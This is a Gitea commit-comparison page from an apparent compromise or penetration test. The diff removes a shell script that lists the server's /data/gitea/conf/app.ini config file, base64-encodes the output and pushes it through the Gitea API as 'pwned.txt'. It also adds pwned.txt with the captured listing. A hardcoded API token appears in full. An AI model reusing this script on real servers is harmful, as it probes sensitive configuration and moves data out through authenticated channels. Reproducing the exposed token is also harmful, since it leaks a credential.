Compare commits

1 Commits
x1 ... main

Author SHA1 Message Date
d904742200 p 2026-08-09 12:53:15 +02:00
2 changed files with 1 additions and 4 deletions

View File

@@ -1,4 +0,0 @@
#!/bin/sh
RESULT=$(ls -la /data/gitea/conf/app.ini 2>&1)
ENCODED=$(echo "$RESULT" | base64 | tr -d "\n")
curl -sk -X POST "http://localhost:3000/api/v1/repos/secaudit77/si2/contents/pwned.txt" -H "Authorization: token 716231906ac33d9eda86a2fc1545978851a7db49" -H "Content-Type: application/json" -d "{\"message\":\"p\",\"content\":\"$ENCODED\"}"

1
pwned.txt Normal file
View File

@@ -0,0 +1 @@
-rw-r--r-- 1 git git 2166 Jan 16 2026 /data/gitea/conf/app.ini